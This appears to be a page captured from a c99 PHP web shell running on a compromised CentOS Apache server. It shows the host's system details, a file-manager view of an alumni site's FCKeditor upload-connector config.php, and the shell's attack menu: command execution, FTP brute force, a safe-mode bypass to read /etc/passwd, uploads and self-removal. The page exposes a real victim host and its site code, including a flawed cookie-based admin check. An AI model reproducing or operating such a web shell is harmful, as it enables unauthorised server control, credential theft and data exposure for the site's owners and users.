!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/alumni/inc/fckeditor/editor/filemanager/connectors/php/   drwxr-xr-x
Free 50.74 GB of 127.8 GB (39.7%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     config.php (8.77 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/*
 * FCKeditor - The text editor for Internet - http://www.fckeditor.net
 * Copyright (C) 2003-2007 Frederico Caldeira Knabben
 *
 * == BEGIN LICENSE ==
 *
 * Licensed under the terms of any of the following licenses at your
 * choice:
 *
 *  - GNU General Public License Version 2 or later (the "GPL")
 *    http://www.gnu.org/licenses/gpl.html
 *
 *  - GNU Lesser General Public License Version 2.1 or later (the "LGPL")
 *    http://www.gnu.org/licenses/lgpl.html
 *
 *  - Mozilla Public License Version 1.1 or later (the "MPL")
 *    http://www.mozilla.org/MPL/MPL-1.1.html
 *
 * == END LICENSE ==
 *
 * Configuration file for the File Manager Connector for PHP.
 */

global $Config ;

require_once(
"../../../../../inc_config.php");
global 
$db_host,$db_user,$db_pass,$db_name;
$tmpdblink = @mysql_connect($db_host,$db_user,$db_pass) or die("Database error: Cannot establish connection.");
@
mysql_select_db($db_name,$tmpdblink) or die("Database error: Cannot select database.");

//Added in 3.8.0
$row mysql_fetch_assoc(mysql_query("SELECT site_url FROM memht_config"));
$siteurl stripslashes($row['site_url']);
$sitepath parse_url($siteurl,PHP_URL_PATH);

if (isset(
$_COOKIE['login_user'])) {
    
$cookiecontent $_COOKIE['login_user'];
    
$cookieitem explode("#",$cookiecontent);
    
$cookie_id intval($cookieitem[0]);
    
$cookie_user $cookieitem[1]; //md5
    
$cookie_pass $cookieitem[2]; //md5
    
    //Database Account Control
    
$cookcheck mysql_fetch_assoc(mysql_query("SELECT user,pass FROM memht_utenti WHERE id=$cookie_id AND rank>1"));
    if (
$cookcheck) {
        
$dblogin_user $cookcheck['user'];
        
$dblogin_pass $cookcheck['pass']; //md5
        
        
if ($cookie_user=!md5($dblogin_user) OR $cookie_pass=!$dblogin_pass) {
            
setcookie("login_user","",time()-31536000,"/"); //-1year
            
@mysql_close($tmpdblink);
            die(
"Access Denied: This file is accessible only by administrators");
            exit(); 
//2 is better than 1
        
}
    }
} else {
    @
mysql_close($tmpdblink);
    die(
"Access Denied: This file is accessible only by administrators");
    exit(); 
//2 is better than 1
}

@
mysql_close($tmpdblink);

// SECURITY: You must explicitly enable this "connector". (Set it to "true").
// WARNING: don't just set "$Config['Enabled'] = true ;", you must be sure that only 
//        authenticated users can access this file or use some kind of session checking.
$Config['Enabled'] = true ;


// Path to user files relative to the document root.
$Config['UserFilesPath'] = $sitepath.'/uploads/' //Fixed in 3.8.0

// Fill the following value it you prefer to specify the absolute path for the
// user files directory. Useful if you are using a virtual directory, symbolic
// link or alias. Examples: 'C:\\MySite\\userfiles\\' or '/root/mysite/userfiles/'.
// Attention: The above 'UserFilesPath' must point to the same directory.
$Config['UserFilesAbsolutePath'] = '' ;

// Due to security issues with Apache modules, it is recommended to leave the
// following setting enabled.
$Config['ForceSingleExtension'] = true ;

// Perform additional checks for image files
// if set to true, validate image size (using getimagesize)
$Config['SecureImageUploads'] = true;

// What the user can do with this connector
$Config['ConfigAllowedCommands'] = array('QuickUpload','FileUpload','GetFolders','GetFoldersAndFiles','CreateFolder') ; //'QuickUpload', 'FileUpload', 'GetFolders', 'GetFoldersAndFiles', 'CreateFolder'

// Allowed Resource Types
$Config['ConfigAllowedTypes'] = array('File','Image','Flash','Media') ; //File, Image, Flash, Media

// For security, HTML is allowed in the first Kb of data for files having the
// following extensions only.
$Config['HtmlExtensions'] = array("html""htm""xml""xsd""txt""js""php") ;

/*
    Configuration settings for each Resource Type
    - AllowedExtensions: the possible extensions that can be allowed. 
        If it is empty then any file type can be uploaded.
    - DeniedExtensions: The extensions that won't be allowed. 
        If it is empty then no restrictions are done here.

    For a file to be uploaded it has to fulfill both the AllowedExtensions
    and DeniedExtensions (that's it: not being denied) conditions.

    - FileTypesPath: the virtual folder relative to the document root where
        these resources will be located. 
        Attention: It must start and end with a slash: '/'

    - FileTypesAbsolutePath: the physical path to the above folder. It must be
        an absolute path. 
        If it's an empty string then it will be autocalculated.
        Useful if you are using a virtual directory, symbolic link or alias. 
        Examples: 'C:\\MySite\\userfiles\\' or '/root/mysite/userfiles/'.
        Attention: The above 'FileTypesPath' must point to the same directory.
        Attention: It must end with a slash: '/'

     - QuickUploadPath: the virtual folder relative to the document root where
        these resources will be uploaded using the Upload tab in the resources 
        dialogs.
        Attention: It must start and end with a slash: '/'

     - QuickUploadAbsolutePath: the physical path to the above folder. It must be
        an absolute path. 
        If it's an empty string then it will be autocalculated.
        Useful if you are using a virtual directory, symbolic link or alias. 
        Examples: 'C:\\MySite\\userfiles\\' or '/root/mysite/userfiles/'.
        Attention: The above 'QuickUploadPath' must point to the same directory.
        Attention: It must end with a slash: '/'

         NOTE: by default, QuickUploadPath and QuickUploadAbsolutePath point to 
         "userfiles" directory to maintain backwards compatibility with older versions of FCKeditor. 
         This is fine, but you in some cases you will be not able to browse uploaded files using file browser.
         Example: if you click on "image button", select "Upload" tab and send image 
         to the server, image will appear in FCKeditor correctly, but because it is placed 
         directly in /userfiles/ directory, you'll be not able to see it in built-in file browser.
         The more expected behaviour would be to send images directly to "image" subfolder.
         To achieve that, simply change
            $Config['QuickUploadPath']['Image']            = $Config['UserFilesPath'] ;
            $Config['QuickUploadAbsolutePath']['Image']    = $Config['UserFilesAbsolutePath'] ;
        into:    
            $Config['QuickUploadPath']['Image']            = $Config['FileTypesPath']['Image'] ;
            $Config['QuickUploadAbsolutePath']['Image']     = $Config['FileTypesAbsolutePath']['Image'] ;                    
*/

$Config['AllowedExtensions']['File']    = array('7z''aiff''asf''avi''bmp''csv''doc''fla''flv''gif''gz''gzip''jpeg''jpg''mid''mov''mp3''mp4''mpc''mpeg''mpg''ods''odt''pdf''png''ppt''pxd''qt''ram''rar''rm''rmi''rmvb''rtf''sdc''sitd''swf''sxc''sxw''tar''tgz''tif''tiff''txt''vsd''wav''wma''wmv''xls''xml''zip') ;
$Config['DeniedExtensions']['File']        = array() ;
$Config['FileTypesPath']['File']        = $Config['UserFilesPath'] . 'file/' ;
$Config['FileTypesAbsolutePath']['File']= ($Config['UserFilesAbsolutePath'] == '') ? '' $Config['UserFilesAbsolutePath'].'file/' ;
$Config['QuickUploadPath']['File']        = $Config['UserFilesPath'] . 'file/' ;
$Config['QuickUploadAbsolutePath']['File']= $Config['UserFilesAbsolutePath'] ;

$Config['AllowedExtensions']['Image']    = array('bmp','gif','jpeg','jpg','png') ;
$Config['DeniedExtensions']['Image']    = array() ;
$Config['FileTypesPath']['Image']        = $Config['UserFilesPath'] . 'image/' ;
$Config['FileTypesAbsolutePath']['Image']= ($Config['UserFilesAbsolutePath'] == '') ? '' $Config['UserFilesAbsolutePath'].'image/' ;
$Config['QuickUploadPath']['Image']        = $Config['UserFilesPath'] . 'image/' ;
$Config['QuickUploadAbsolutePath']['Image']= $Config['UserFilesAbsolutePath'] ;

$Config['AllowedExtensions']['Flash']    = array('swf','flv') ;
$Config['DeniedExtensions']['Flash']    = array() ;
$Config['FileTypesPath']['Flash']        = $Config['UserFilesPath'] . 'flash/' ;
$Config['FileTypesAbsolutePath']['Flash']= ($Config['UserFilesAbsolutePath'] == '') ? '' $Config['UserFilesAbsolutePath'].'flash/' ;
$Config['QuickUploadPath']['Flash']        = $Config['UserFilesPath'] . 'flash/' ;
$Config['QuickUploadAbsolutePath']['Flash']= $Config['UserFilesAbsolutePath'] ;

$Config['AllowedExtensions']['Media']    = array('aiff''asf''avi''bmp''fla''flv''gif''jpeg''jpg''mid''mov''mp3''mp4''mpc''mpeg''mpg''png''qt''ram''rm''rmi''rmvb''swf''tif''tiff''wav''wma''wmv') ;
$Config['DeniedExtensions']['Media']    = array() ;
$Config['FileTypesPath']['Media']        = $Config['UserFilesPath'] . 'media/' ;
$Config['FileTypesAbsolutePath']['Media']= ($Config['UserFilesAbsolutePath'] == '') ? '' $Config['UserFilesAbsolutePath'].'media/' ;
$Config['QuickUploadPath']['Media']        = $Config['UserFilesPath'] . 'media/' ;
$Config['QuickUploadAbsolutePath']['Media']= $Config['UserFilesAbsolutePath'] ;

?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0175 ]--